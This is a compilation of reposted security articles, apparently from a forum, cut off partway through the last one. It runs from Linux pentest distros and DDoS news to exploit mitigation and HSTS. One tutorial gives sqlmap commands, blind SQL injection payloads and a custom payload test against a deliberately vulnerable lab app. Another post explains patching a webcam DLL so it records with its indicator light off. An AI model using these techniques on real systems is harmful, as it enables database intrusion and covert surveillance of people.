Meet Parrot Security OS (a Linux Distro) – Pentesting in the cloud! By Henry Dalziel Information Security Blogger Many of our regular readers and Hacker Hotshot community know by now that we enjoy covering news on Linux Pentesting Distro’s, and whilst the heavy hitters such as Kali Linux and BackBox tend to get most of the lime light, we particularly like exposing upcoming distros, and here is one certainly worth blogging about: Parrot Security OS. Linux Penetration Testing distro’s (call them hacking distro’s if you want) basically revolve around the same premise, i.e. storing ‘best of breed’ pentesting tools within an easy to use Operating System that are efficiently updated. Now, the interesting thing about Parrot Security OS is that the team behind it have a novel way of using the cloud to manage the OS. We have to be honest in that we are not entirely sure how the Cloud Pentesting Distro concept works – and for that reason we’d be grateful if any readers could chime in and drop a comment below to help improve this post. Here’s what we do know about this distro, which does have a feeling that it is packing a punch, is the following: First off, that it is based on Debian GNU/Linux mixed with Frozenbox OS and Kali Linux, to, in their own words: ‘provide the best penetration and security testing experience.’ Certainly, taking the Debian Kali Linux route is a smart move since it is a tried and tested platform that offers reliability. Another thing we do know, is that the design of the distro, as you would expect from a bunch of Italian Pentesters looks very slick and easy on the eye – and let’s be honest, that is important because if you are anything like us you are spending too much time in front of your monitors. Of interest, and on the subject of Italy, we do note that there are several IT security distro’s that hail from Italy, namely BackBox and CAINE (which is actually more of a forensics distro). Learn more and get a copy of Parrot 0.6 here. Pentesting in the cloud This does intrigue us and how it can be applied to a penetration testers operating system. Does the OS fit into a particular cloud service model? As per the National Institute of Standards and Technology (NIST SP800-145) definition there are three cloud service models. They are: Infrastructure as a Service (IaaS): whereby the provider supplies hardware and network connectivity. The tenant on the other hand is responsible for the virtual machine and the software stack that operates within it. Platform as a Service (PaaS): this is when the tenant supplies the web or database application (for example) that they would like to deploy, and the provider supplies all the necessary components required to run the app. Software as a Service (SaaS): this is the last category whereby the provider supplies the app and all the components necessary for its’ operation. SaaS is meant to be a ‘quick-fix’ for the tenant. In Summary We might be way off the mark here – and if we are – please let us know by dropping a comment below. We will be keeping an eye on the Parrot Security OS so please consider this as your first introduction to what looks like a promising project, and don’t forget where you heard it first! On the subject of penetration distro’s, we had an interesting Hacker Hotshot presentation from Andrew Hoog in which he discussed ‘How To Turn BYOD Risk Into Mobile Security Strength’. The reason we are bringing that up is because Andrew is the co-founder of viaForensics and co-developer of Santoku, a distro that focuses on mobile forensics – another niche and interesting area of IT security. We wish the Parrot (Frozen Box) team all the best and look forward to hearing how the project develops. Sursa: Meet Parrot Security OS (a Linux Distro) - Pentesting in the cloud!
-
Sqlmap Tricks for Advanced SQL Injection Sqlmap is an awesome tool that automates SQL Injection discovery and exploitation processes. I normally use it for exploitation only because I prefer manual detection in order to avoid stressing the web server or being blocked by IPS/WAF devices. Below I provide a basic overview of sqlmap and some configuration tweaks for finding trickier injection points. Basics Using sqlmap for classic SQLi is very straightforward: ./sqlmap.py -u 'http://mywebsite.com/page.php?vulnparam=hello' The target URL after the -u option includes a parameter vulnerable to SQLi (vulnparam). Sqlmap will run a series of tests and detect it very quickly. You can also explicitly tell sqlmap to only test specific parameters with the -p option. This is useful when the query contains various parameters, and you don't want sqlmap to test everyting. You can use the --data option to pass any POST parameters. To maximize successful detection and exploitation, I usually use the --headers option to pass a valid User-Agent header (from my browser for example). Finally, the --cookie option is used to specify any useful Cookie along with the queries (e.g. Session Cookie). Advanced Attack Sometimes sqlmap cannot find tricky injection points and some configuration tweaks are needed. In this example, I will use the Damn Vulnerable Web App (DVWA - Damn Vulnerable Web Application), a deliberately insecure web application used for educational purposes. It uses PHP and a MySQL database. I also customized the source code to simulate a complex injection point. Here is the source of the php file responsible for the Blind SQL Injection exercise located at /[install_dir]/dvwa/vulnerabilities/sqli_blind/source/low.php: [phpcode]<?php if (isset($_GET['Submit'])) { // Retrieve data $id = $_GET['id']; if (!preg_match('/-BR$/', $id)) $html .= '<pre><h2>Wrong ID format</h2></pre>'; else { $id = str_replace("-BR", "", $id); $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; $result = mysql_query($getid); // Removed 'or die' to suppress mysql errors $num = @mysql_numrows($result); // The '@' character suppresses errors making the injection 'blind' if ($num > 0) $html .= '<pre><h2>User exists!</h2></pre>'; else $html .= '<pre><h2>Unknown user!</h2></pre>'; } } ?>[/phpcode] Basically, this code will receive an ID compounded of a numerical value followed by the string "-BR". The application will first validate whether this string is present and will extract the numerical value. Then, it concatenates this value to the SQL query used to check if it is a valid user ID and returns the result ("User exists!”or “Unknown user!"): This page is clearly vulnerable to SQL Injection but due to the string manipulation routine before the actual SQL command, sqlmap is unable to find it: ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1-BR&Submit=Submit#' --level=5 risk=3 -p id I’m using a valid User-Agent and an authenticated Session Cookie. I’m also forcing sqlmap to test the “id” parameter with the -p option. Even when I set the level and risk of tests to their maximum, sqlmap is not able to find it: To pass the validation and successfully exploit this SQLi, we must inject our payload between the numerical value and the "-BR" suffix. This is a typical Blind SQL Injection instance and I’m lazy, so I don’t want to exploit it manually. For more information about this kind of SQLi, please check this link: https://www.owasp.org/index.php/Blind_SQL_Injection. http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=1+%23-BR&Submit=Submit# http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1%27+AND+1=0+%23-BR&Submit=Submit# Note that we are URL-encoding special characters because the parameter is located in the URL. The decoded string is: id=1' AND 1=1 #-BR Sqlmap Tweaking How to force sqlmap to inject there? Well, the first idea is to use the --suffix option with the value "-BR" and set "id=1" in the query. It will force sqlmap to add this value after every query. Let’s try it with debug information (-v3 option): ./sqlmap.py --headers="User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:25.0) Gecko/20100101 Firefox/25.0" --cookie="security=low; PHPSESSID=oikbs8qcic2omf5gnd09kihsm7" -u 'http://localhost/dvwa/vulnerabilities/sqli_blind/?id=1&Submit=Submit#' --level=5 risk=3 -p id --suffix="-BR" -v3 I'm still not having any luck. To check what’s going on, we can increase the debug level or set the --proxy=”http://localhost:8080” option to point to your favorite web proxy. It appears sqlmap does not add comments when a suffix is passed to the command line. So every query looks like this: id=1’ AND 1=0 -BR. Obviously, it is not working. Below is how you should handle this situation. The file located at "sqlmap/xml/payloads.xml" contains all the tests sqlmap will perform. It is an XML file and you can add your proper tests to it. As this is a boolean-based blind SQLi instance, I am using the test called "AND boolean-based blind - WHERE or HAVING clause (MySQL comment)" as a template and modifying it. Here is my new test I added to my payload.xml file: Existing user ID: Non-existing user ID: A valid query (True): A non-valid query (False): <test> <title>AND boolean-based blind - WHERE or HAVING clause (Forced MySQL comment)</title> <stype>1</stype> <level>1</level> <risk>1</risk> <clause>1</clause> <where>1</where> <vector>AND [INFERENCE] #</vector> <request> <payload>AND [RANDNUM]=[RANDNUM] #</payload> </request> <response> <comparison>AND [RANDNUM]=[RANDNUM1] #</comparison> </response> <details> <dbms>MySQL</dbms> </details> </test> This test simply forces the use of the # character (MySQL comment) in every payload. The original test was using the <comment> tag as a sub-tag of the <request> tag. As we saw, it is not working with suffixes. Now we explicitly want this special character included at the end of every request, before the "-BR" suffix. A detailed description of the available options is included in the payload.xml file, but here is a summary of the settings I used: <title>: the title… duh. <stype>: type of test, 1 means boolean-based blind SQL injection. <level>: level of this test, set to 1 (can be set to anything you want as long as you set the right --level option in the command line). <risk>: risk of this test (like the <level> tag, can be set to anything you want as long as you set the right --risk option in the command line). <clause>: in which clause this will work, 1 means WHERE or HAVING clauses. <where>: where to insert the payload, 1 means appending the payload to the parameter original value. <vector>: the payload used for exploitation and also used to check if the injection point is a false positive. <request>: the payload that will be injected and should trigger a True condition (e.g. ' AND 1=1 #). Here the sub-tag <payload> has to be used. <response>: the payload that will be injected and should trigger a False condition (e.g. ' AND 1=0 #). Here the sub-tag <comparison> has to be used. <details>: set the database in used: MySQL. Here the sub-tag <dbms> has to be used. Let's see if this works: Great! Now we can easily exploit this with sqlmap. sqlmap is a very powerful tool and highly customizable, I really recommend it if you’re not already using it. It can save you a lot of time during a penetration test. Posted by Christophe De La Fuente on 30 December 2013 Sursa: Sqlmap Tricks for Advanced SQL Injection - SpiderLabs Anterior
-
- 1
-
-
Cash machines raided with infected USB sticks By Chris Vallance BBC Radio 4 Researchers have revealed how cyber-thieves sliced into cash machines in order to infect them with malware earlier this year. The criminals cut the holes in order to plug in USB drives that installed their code onto the ATMs. Details of the attacks on an unnamed European bank's cash dispensers were presented at the hacker-themed Chaos Computing Congress in Hamburg, Germany. The crimes also appear to indicate the thieves mistrusted each other. The two researchers who detailed the attacks have asked for their names not to be published Access code The thefts came to light in July after the lender involved noticed several its ATMs were being emptied despite their use of safes to protect the cash inside. After surveillance was increased, the bank discovered the criminals were vandalising the machines to use the infected USB sticks. The malware was installed onto the ATMs via USB sticks Once the malware had been transferred they patched the holes up. This allowed the same machines to be targeted several times without the hack being discovered. To activate the code at the time of their choosing the thieves typed in a 12-digit code that launched a special interface. Analysis of software installed onto four of the affected machines demonstrated that it displayed the amount of money available in each denomination of note and presented a series of menu options on the ATM's screen to release each kind. The researchers said this allowed the attackers to focus on the highest value banknotes in order to minimise the amount of time they were exposed. But the crimes' masterminds appeared to be concerned that some of their gang might take the drives and go solo. To counter this risk the software required the thief to enter a second code in response to numbers shown on the ATM's screen before they could release the money. The correct response varied each time and the thief could only obtain the right code by phoning another gang member and telling them the numbers displayed. If they did nothing the machine would return to its normal state after three minutes. The researchers added the organisers displayed "profound knowledge of the target ATMs" and had gone to great lengths to make their malware code hard to analyse. However, they added that the approach did not extend to the software's filenames - the key one was called hack.bat. Sursa: BBC News - Cash machines raided with infected USB sticks
-
Defcon 21 - Evolving Exploits Through Genetic Algorithms Description: This talk will discuss the next logical step from dumb fuzzing to breeding exploits via machine learning & evolution. Using genetic algorithms, this talk will take simple SQL exploits and breed them into precision tactical weapons. Stop looking at SQL error messages and carefully crafting injections, let genetic algorithms take over and create lethal exploits to PWN sites for you! soen (@soen_vanned) is a reverse engineer and exploit developer for the hacking team V&. As member of the team, he has participated and won Open Capture the Flag DC 16, 18, and 19. Soen also participated in the DDTEK competition in DEF CON 20. 0xSOEN@blogspot.com For More Information please visit : - https://www.defcon.org/html/defcon-21/dc-21-speakers.html Sursa: Defcon 21 - Evolving Exploits Through Genetic Algorithms
-
[h=1]Attackers Wage Network Time Protocol-Based DDoS Attacks[/h]Kelly Jackson Higgins Attackers have begun exploiting an oft-forgotten network protocol in a new spin on distributed denial-of-service (DDoS) attacks, as researchers spotted a spike in so-called NTP reflection attacks this month. The Network Time Protocol, or NTP, syncs time between machines on the network, and runs over port 123 UDP. It's typically configured once by network administrators and often is not updated, according to Symantec, which discovered a major jump in attacks via the protocol over the past few weeks. "NTP is one of those set-it-and-forget-it protocols that is configured once and most network administrators don't worry about it after that. Unfortunately, that means it is also not a service that is upgraded often, leaving it vulnerable to these reflection attacks," says Allan Liska, a Symantec researcher in blog post last week. Attackers appear to be employing NTP for DDoSing similar to the way DNS is being abused in such attacks. They transmit small spoofed packets requesting a large amount of data sent to the DDoS target's IP address. According to Symantec, it's all about abusing the so-called "monlist" command in an older version of NTP. Monlist returns a list of the last 600 hosts that have connected to the server. "For attackers the monlist query is a great reconnaissance tool. For a localized NTP server it can help to build a network profile. However, as a DDoS tool, it is even better because a small query can redirect megabytes worth of traffic," Liska explains in the post. Monlist modules can be found in NMAP as well as in Metasploit, for example. Metasploit includes monlist DDoS exploit module. The spike in NTP reflection attacks occurred mainly in mid-December, with close to 15,000 IPs affected, and dropped off significantly after December 23, according to Symantec's data,. Symantec recommends that organizations update their NTP implementations to version 4.2.7, which does not use the monlist command. Another option is to disable access to monlist in older versions of NTP. "By disabling monlist, or upgrading so the command is no longer there, not only are you protecting your network from unwanted reconnaissance, but you are also protecting your network from inadvertently being used in a DDoS attack," Liska says. Sursa: Attackers Wage Network Time Protocol-Based DDoS Attacks -- Dark
-
Detection of Widespread Weak Keys in Network Devices Abstract RSA and DSA can fail catastrophically when used with malfunctioning random number generators, but the extent to which these problems arise in practice has never been comprehensively studied at Internet scale. We perform the largest ever network survey of TLS and SSH servers and present evidence that vulnerable keys are surprisingly widespread. We find that 0.75% of TLS certificates share keys due to insufficient entropy during key generation, and we suspect that another 1.70% come from the same faulty implementations and may be susceptible to compromise. Even more alarmingly, we are able to obtain RSA private keys for 0.50% of TLS hosts and 0.03% of SSH hosts, because their public keys shared nontrivial common factors due to entropy problems, and DSA private keys for 1.03% of SSH hosts, because of insufficient signature randomness. We cluster and investigate the vulnerable hosts, finding that the vast majority appear to be headless or embedded devices. In experiments with three software components commonly used by these devices, we are able to reproduce the vulnerabilities and identify specific software behaviors that induce them, including a boot-time entropy hole in the Linux random number generator. Finally, we suggest defenses and draw lessons for developers, users, and the security community. Download Download the conference version or the more detailed extended version. @InProceedings{weakkeys12, author = {Nadia Heninger and Zakir Durumeric and Eric Wustrow and J. Alex Halderman}, title = {Mining Your {P}s and {Q}s: {D}etection of Widespread Weak Keys in Network Devices}, booktitle = {Proceedings of the 21st {USENIX} Security Symposium}, month = aug, year = 2012 } Sursa: https://factorable.net/paper.html
-
C. Apoi C++. Apoi orice porcarie iti pofteste inima.
-
Researchers Crack 4096-bit RSA Encryption With a Microphone
Nytro replied to Usr6's topic in Stiri securitate
Dementi. Imi place. -
[h=3]How to disable webcam light on Windows[/h] By Robert Graham In recent news, it was revealed the FBI has a "virus" that will record a suspect through the webcam secretly, without turning on the LED light. Some researchers showed this working on an older Macbook. In this post, we do it on Windows. [h=3]Hardware, firmware, driver, software[/h] In theory, the indicator light should be a hardware function. When power is supplied to the sensor, it should also be supplied to an indicator light. This would make the light impossible to hack. However, I don't think anybody does this. In some cases, it's a firmware function. Webcams have their own wimpy microprocessors and run code directly within the webcam. Control the light is one of those firmware functions. Some, like Steve Jobs, might describe this as "hardware" control, because it resides wholly within the webcam hardware, but it's still a form of software. This is especially true because firmware blobs are unsigned, and therefore, can be hacked. In some cases, it's the driver, either within the kernel mode driver that interfaces at a low-level with the hardware, or a DLL that interfaces at a high-level with software. [h=3]How to[/h] As reverse engineers, we simply grab these bits of software/firmware/drivers and open them in our reverse engineering tools, like IDApro. It doesn't take us long to find something to hack. For example, on our Dell laptop, we find the DLL that comes with the RealTek drivers for our webcam. We quickly zero in on the exported function "TurnOnOffLED()". We can quickly make a binary edit to this routine, causing it to return immediately without turning on the light. Dave shows in the in the video below. First, the light turns on as normal, then he stops the webcam, replaces the DLLs with his modified ones, and then turns on the webcam again. As the following video shows, after the change, the webcam is recording him recording the video, but the light is no longer on. [h=3]The deal with USB[/h] Almost all webcams, even those inside your laptop's screen, are USB devices. There is a standard for USB video cameras, the UVC standard. This means most hardware will run under standard operating systems (Windows, Mac, Linux) without drivers from the manufacturer -- at least enough to get Skype working. Only the more advanced features particular to each vendor need vendor specific drivers. According to this standard, the LED indicator light is controlled by the host software. The UVC utilities that come with Linux allow you to control this light directly with a command-line tool, being able to turn off the light while the camera is on. To hack this on Windows appears to require a filter driver. We are too lazy to write one, which is why we just hacked the DLLs in the demonstration above. We believe this is what the FBI has done: a filter driver for the UVC standard would get most webcam products from different vendors, without the FBI haven't to write a custom hack for different vendors. USB has lots of interesting features. It's designed with the idea that a person without root/administrator access may still want to plug in a device and use it. Therefore, there is the idea of "user-mode" drivers, where a non-administrator can nonetheless install drivers to access the USB device. This can be exploited with the Device Firmware Update (DFU) standard. It means in many cases that in user-mode, without administrator privileges, the firmware of the webcam can be updated. The researchers in the paper above demonstrate this with a 2008 MacBook, but in principle, it should work on modern Windows 7 notebook computers as well, using most devices. The problem for a hacker is that they would have to build a hacked firmware for lots of different webcam chips. The upside is that they can do this all without getting root/administrator access to the machine. [h=3]Conclusion[/h] In the above video, Dave shows that the story of the FBI virus secretly enabling the webcam can work on at least one Windows machine. In our research we believe it can be done generically across most any webcam, using most any operating system. Sursa: Errata Security: How to disable webcam light on Windows
-
[h=1]Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released[/h] December 20th, 2013, 08:35 GMT · By Silviu Stahie Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) has been released and is now available for download and testing. We prepared a screenshot tour to get a sneak peek at the new operating system. The best news for the fans of Ubuntu GNOME is that the 14.04 will include a number of GNOME applications from the 3.10 stack. Also, the GNOME Classic session has been included. To try it, users just have to choose it from the Sessions option on the login screen. “The Alpha 1 Trusty Tahr snapshot includes the 3.12.0.7 Ubuntu Linux kernel which is based on the the upstream v3.12.4 Linux kernel. The 3.12 release contains improvements to the dynamic tick code, support infrastructure for DRM render nodes, TSO sizing and the FQ scheduler in the network layer, support for user namespaces in the XFS filesystem, multithreaded RAID5 in the MD subsystem, and more,” reads the official announcement. Check it out for more details about this release. Download Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) right now from Softpedia. Remember that this is a development version and it should NOT be installed on production machines. It is intended for testing purposes only. Sursa: Ubuntu GNOME 14.04 LTS Alpha 1 (Trusty Tahr) Officially Released – Screenshot Tour
-
Exploit Protection for Microsoft Windows By Guest Writer posted 13 Dec 2013 at 05:52AM Software exploits are an attack technique used by attackers to silently install various malware – such as Trojans or backdoors – on a user’s computer without requiring social engineering to trick the victim into manually running a malicious program. Such malware installation through an exploit would be invisible to the user and gives attackers an undeniable advantage. Exploits attempt to use vulnerabilities in particular operating system or application components in order to allow malware to execute. In our previous blog post titled Solutions to current antivirus challenges, we discussed several methods by which security companies can tackle the exploit problem. In this post, we provide more detail on the most exploited applications on Microsoft Windows platforms and advise a few steps users can (and should) take to further strengthen their defenses. Exploitation Targets The following applications are the ones most targeted by attackers through exploitation: Web browsers (Microsoft Internet Explorer, Google Chrome, Apple Safari, Mozilla Firefox and others). Plug-ins for browsers (Adobe Flash Player, Oracle Java, Microsoft Silverlight). The Windows operating system itself – notably the Win32 subsystem driver – win32k.sys. Adobe Reader and Adobe Acrobat Other specific applications Different types of exploits are used in different attack scenarios. One of the most dangerous scenarios for an everyday user is the use of exploits by attackers to remotely install code into the operating system. In such cases, we usually find that the user has visited a compromised web resource and their system has been invisibly infected by malicious code (an attack often referred to as a “drive-by download”). If your computer is running a version of software such as a web browser or browser plug-ins that are vulnerable to exploitation, the chances of your system becoming infected with malware are very high due to the lack of mitigation from the software vendor. In the case of specific targeted attacks or attacks like a “watering hole” attack, when the attacker plants the exploit code on websites visited by the victim, the culprit can use zero-day (0-day) vulnerabilities in software or the operating system. Zero-day vulnerabilities are those that have not been patched by the vendor at the time they are being exploited by attackers. Another common technique used in targeted attacks is to send the victim a PDF document “equipped” with an exploit. Social engineering is also often used, for example by selecting a filename and document content in such a way that the victim is likely to open it. While PDFs are first and foremost document files, Adobe has extended the file format to maximize its data exchange functionality by allowing scripting and the embedding of various objects into files, and this can be exploited by an attacker. While most PDF files are safe, some can be dangerous, especially if obtained from unreliable sources. When such a document is opened in a vulnerable PDF reader, the exploit code triggers the malicious payload (such as installation of a backdoor) and a decoy document is often opened. Another target which attackers really love is Adobe Flash Player, as this plug-in is used for playback of content on all the different browsers. Like other software from Adobe, Flash Player is updated regularly as advised by the company’s updates (see Adobe Security Bulletins). Most of these vulnerabilities are of the Remote Code Execution (RCE) type and this indicates that the attackers could use such a vulnerability for remotely executing malicious code on a victim’s computer. In relation to the browser and operating system, Java is a virtual machine (or runtime environment JRE) able to execute Java applications. Java applications are platform-independent, making Java a very popular tool to use. Today Java is used by more than three billion devices. As with other browser plug-ins, misusing the Java plug-in is attractive to attackers, and given our previous experience of the malicious actions and vulnerabilities with which it is associated, we can say that as browser plug-ins go, Java represents one of the most dangerous components. Also, various components of the Windows operating system itself can be used by attackers to remotely execute code or elevate privileges. The figure below shows the number of patches various Windows components have received during 2013 (up until November). Chart 1: Number of patches per component The “Others” category includes vulnerabilities which were fixed for various Operating System components (CSRSS, SCM, GDI, Print Spooler, XML Core Services, OLE, NFS, Silverlight, Remote Desktop Client, Active Directory, RPC, Exchange Server). This ranking shows that Internet Explorer fixed the largest number of vulnerabilities, more than a hundred vulnerabilities having been fixed in the course of fourteen updates. Seven of the vulnerabilities had the status ‘is-being-exploited-in-the-wild at the time of patching’: that is, they were being actively exploited by attackers. The second most-patched component of the operating system is the infamous Windows subsystem driver win32k.sys. Vulnerabilities in this driver are used by attackers to escalate privileges on the system, for example, to bypass restrictions imposed by User Account Control (UAC), a least-privilege mechanism introduced by Microsoft in Windows Vista to reduce the risk of compromise by an attack that requires administrator privileges. Mitigation techniques We now look in more detail at the most exploited applications and provide some steps that you can (and should) take to mitigate attacks and further strengthen your defenses. Windows Operating System Modern versions of Microsoft Windows – i.e., Windows7, 8, and 8.1 at time of writing – have built-in mechanisms which can help to protect user from destructive actions delivered by exploits. Such features became available starting with Windows Vista and were upgraded in the most recent operating system versions. These features include: DEP (Data Execution Prevention) & ASLR (Address Space Layout Randomization) mechanisms introduce an extra layer of complication when attempting to exploit vulnerabilities in applications and the operating system. This is due to special restrictions on the use of memory which should not be used to execute code, and the placement of program modules into memory at random addresses. UAC (User Account Control) has been upgraded from Windows 7 onward and requires confirmation from the user before programs can be run that need to change system settings and create files in system directories. SmartScreen Filter helps to prevent the downloading of malicious software from the Internet based on the file’s reputation: files known to be malicious or not recognized by the filter are blocked. Originally it was a part of Internet Explorer, but with the release of Windows 8 it was built into the operating system so it now works with all browsers. Special “Enhanced Protected Mode” for Internet Explorer (starting from IE10): on Windows 8 this mode allows the browser’s tabs to be run in the context of isolated processes, which are prevented from performing certain actions (a technique also known as sandboxing). For Windows 7 x64 (64-bit) this feature allows IE to run tabs as separate 64-bit processes, which help to mitigate the common heap-spray method of shellcode distribution. For more information, refer to the MSDN blog (here and here). PDF files In view of the high risks posed by the use PDF documents from unsafe sources, and given the low awareness of many users and their reluctance to protect themselves adequately, modern versions of Adobe Reader have a special “Protected Mode” (also referred to as sandboxing) for viewing documents. When using this mode, code from the PDF file is prevented from executing certain potentially dangerous functions. Figure 2: “Sandbox” mode options for Adobe Reader can be enabled through Edit -> Preferences -> Security (Enhanced). By default, Protected Mode is turned off. Despite the active option Enable Protected Mode at startup, sandbox mode stays turned off because Protected Mode setting is set to “Disabled” status. Accordingly, after installation it is strongly recommended that you turn on this setting to apply to “Files From Potentially Unsafe Locations” or, even better, “All files”. Please note that when you turn on protected view, Adobe Reader disables several features which can be used in PDF files. Therefore, when you open the file, you may receive a tooltip alert advising you that protected mode is active. Figure 3: Tooltip which indicates active protected mode. If you are sure about the origin and safety of the file, you can activate all of its functions by pressing the appropriate button. Adobe Flash Player Adobe, together with the manufacturers of web browsers, has made available special features and protective mechanisms to defend against exploits that target the Flash Player plug-in. Browsers such as Microsoft Internet Explorer (starting with version 10 on Windows 8.0 and later), Google Chrome and Apple Safari (latest version) launch the Flash Player in the context of specially-restricted (i.e. sandboxed) process, limiting the ability of this process to access many system resources and places in the file system, and also to limit how it communicates with the network. Timely update of the Flash Player plug-in for your browser is very important. Google Chrome and Internet Explorer 10+ are automatically updated with the release of new versions of Flash Player. To check your version of the Adobe Flash Player you can use this official Adobe resource. In addition, most browsers support the ability to completely disable the Flash Player plug-in, so as to prohibit the browser from playing such content. Internet Browsers At the beginning of this article we already mentioned that attackers often rely on delivering malicious code using remote code execution through the browser (drive-by downloads). Regardless of what browser plug-ins are installed, the browser itself may contain a number of vulnerabilities known to the attacker (and possibly not known to the browser vendor). If the vulnerability has been patched by the developer and an update for it is available, the user can install it and without worrying that it will be used to compromise the operating system. On the other hand, if the attackers are using a previously unknown vulnerability, in other words one that has not yet been patched (zero-day), the situation is more complicated for the user. Modern browsers and operating systems incorporate special technologies for isolating application processes, thus creating special restrictions on performing various actions, which the browser should not be able to perform. In general, this technique is called sandboxing and it allows users to limit what a process can do. One example of this isolation is the fact that modern browsers (for example, Google Chrome and Internet Explorer) execute tabs as separate processes in the operating system, thus allowing restricted permissions for executing certain actions in a specific tab as well as maintaining the stability of the browser. If one of the tabs hangs, the user can terminate it without terminating other tabs. In modern versions of Microsoft’s Internet Explorer browser (IE10 and IE11) there is a special sandboxing technology, which is called “Enhanced Protected Mode” (EPM). This mode allows you to restrict the activity of a process tab or plug-in and thus make exploitation much more difficult for attackers. Figure 4: Enhanced Protected Mode option turned on in Internet Explorer settings (available since IE10). On Windows 8+ (IE11) it was turned on by default before applying MS13-088. EPM has been upgraded for Windows 8. If you are using EPM in Windows 7 x64, then this feature will cause that browser tabs are run as 64-bit processes (on a 64-bit OS Internet Explorer runs its tabs as 32-bit processes by default). Note that by default EPM is off. Figure 5. Demonstration of EPM at work on Windows 7 x64 [using Microsoft Process Explorer]. With this option turned on, the processes of browser tabs work as 64-bit, making them difficult to use for malicious code installation (or at least harder for heap-spraying attacks). Starting with Windows 8, Enhanced Protected Mode has been expanded in order to isolate (sandbox) a process’s actions at the operating system level. This technology is called “AppContainer” and allows the maximum possible benefit from the use of the EPM option. Internet Explorer tab processes with the EPM option active work in AppContainer mode. In addition, Windows 8 EPM mode is enabled by default (IE11). Figure 6. EPM implementation in Windows 8. In Windows 7 x64 EPM uses 64-bit processes for IE tabs for mitigation, instead of AppContainer. Note that before November Patch Tuesday 2013, which includes MS13-088 update (Cumulative Security Update for Internet Explorer: November 12, 2013) Microsoft supported EPM as default setting for IE11 on Windows 8+. But this update disables EPM for IE11 as default setting. So, now if you reset advanced IE settings («Restore advanced settings» option) to ‘initial state’, EPM will turn off by default. Google Chrome, like Internet Explorer, has special features to mitigate drive-by download attacks. But unlike Internet Explorer, sandboxing mode for Chrome is always active and requires no additional action by the user to launch it. This feature of Chrome means that tab processes work with restricted privileges, which does not allow them to perform various system actions. Figure 7: Sandboxing mode as implemented in Google Chrome. Notice that almost all of the user’s SID groups in the access token have the “Deny” status, restricting access to the system. Additional information can be found on MSDN. In addition to this mode, Google Chrome is able to block malicious URL-addresses or websites which have been blacklisted by Google because of malicious actions (Google Safe Browsing). This feature is similar to Internet Explorer’s SmartScreen. Figure 8: Google Safe Browsing in Google Chrome blocking a suspicious webpage. When you use Java on Windows, its security settings can be changed using the control panel applet. In addition, the latest version contains security settings which allow you to configure the environment more precisely, allowing only trusted applications to run. Figure 9: Options for updating Java. To completely disable Java in all browsers used in the system, remove the option “Enable Java content in the browser” in Java settings. Figure 10: Java setting to disable its use in all browsers. EMET Microsoft has released a free tool for users to help protect the operating system from malicious actions used in exploits. Figure 11: EMET interface. The Enhanced Mitigation Experience Toolkit (EMET) uses preventive methods to block various actions typical of exploits and to protect applications from attacks. Despite the fact that Windows 7 and Windows 8 have built-in options for DEP and ASLR, which are enabled by default and intended to mitigate the effects of exploitation, EMET allows the introduction of new features for blocking the action of exploits and enable DEP or ASLR for specified processes (increasing system protection in older versions of the OS). This tool must be configured separately for each application: in other words, to protect an application using this tool, you need to include that specific application in the list. In addition there is a list of applications for which EMET is enabled by default: for example, the browser Internet Explorer, Java and Microsoft Office. It’s a good idea to add to the list your favorite browser and Skype. Operating System Updates Keeping your operating system and installed software promptly updated and patched is good practice because vendors regularly use patches and updates to address emerging vulnerabilities. Note that Windows 7 and 8 have the ability to automatically deliver updates to the user by default. You can also check for updates through the Windows Control Panel as shown below. Figure 12: Windows Update Generic Exploit Blocking So far, we have looked at blocking exploits that are specific to the operating system or the applications you are using. You may also want to look at blocking exploits in general. You may be able to turn to your security software for this. For example, ESET introduced something called the Exploit Blocker in its seventh generation of security products with its anti-malware programs ESET Smart Security and ESET NOD32 Antivirus. The Exploit Blocker is a proactive mechanism that works by analyzing suspicious program behavior and generically detecting signs of exploitation, regardless of the specific vulnerability that was used. Figure 1: ESET Exploit Blocker option turned on in HIPS settings. Conclusion Any operating system or program which is widely used will be studied by attackers for vulnerabilities to exploit for illicit purposes and financial gain. As we have shown above, Adobe, Google and Microsoft have taken steps to make these types of attacks against their software more difficult. However, no single protection technique can be 100% effective against determined adversaries, and users have to remain vigilant about patching their operating systems and applications. Since some vendors update their software on a monthly basis, or even less frequently, it is important to use (and keep updated) anti-malware software which blocks exploits. This article was contributed by: Artem Baranov, Lead Virus Analyst for ESET’s Russian distributor. Author Guest Writer, We Live Security Sursa: Exploit Protection for Microsoft Windows
-
HSTS – The missing link in Transport Layer Security Posted on November 30, 2013 by Scott Helme HTTP Strict Transport Security (HSTS) is a policy mechanism that allows a web server to enforce the use of TLS in a compliant User Agent (UA), such as a web browser. HSTS allows for a more effective implementation of TLS by ensuring all communication takes place over a secure transport layer on the client side. Most notably HSTS mitigates variants of man in the middle (MiTM) attacks where TLS can be stripped out of communications with a server, leaving a user vulnerable to further risk. Introduction In a previous blog I demonstrated using SSLstrip to MiTM SSL and the dangers it posed. Once installed as a MiTM, SSLstrip will connect to a server on behalf of the victim and communicate using HTTPS. The server is satisfied with the secure communication to the attacker who then transparently forwards all data to the victim using HTTP. This is possible because the victim does not enforce the use of TLS and either typed in twitter.com and the browser defaulted to http://, or they were using a bookmark or link that contained http://. Once Twitter receives the request it issues a redirect back to the victim’s browser pointing to the https:// URL. Because all of this is done using HTTP the communications are vulnerable to be intercepted and modified by SSLstrip. Crucially, the user receives no warnings during the attack and can’t verify if they should be using https://. HSTS mitigates this threat by providing an option to enforce the use of TLS by the browser, which would prevent the user navigating to the site using http://. Implementing HSTS In order to implement HSTS a host must declare to a UA that it is a HSTS Host by issuing a HSTS Policy. This is done with the addition of the HTTP response header ‘Strict-Transport-Security: max-age=31536000‘. The max-age directive is required and can be any value from 0 upwards, which is the number of seconds after receiving the policy that the UA is to treat the host issuing it as a HSTS Host. It’s worth noting that a max-age directive value of 0 informs the UA to cease treating the host that issued it as 